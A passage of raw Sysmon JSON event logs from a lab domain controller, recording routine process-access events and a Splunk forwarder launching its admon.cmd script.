C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.877\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-0010BA030400}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.877","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-0010BA030400}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.988\r\nProcessGuid: {41C8662E-1F78-5F25-0000-0010BC050400}\r\nProcessId: 3960\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.988","ProcessGuid":"{41C8662E-1F78-5F25-0000-0010BC050400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\admon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010066A0300}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010066A0300}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010066A0300}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-0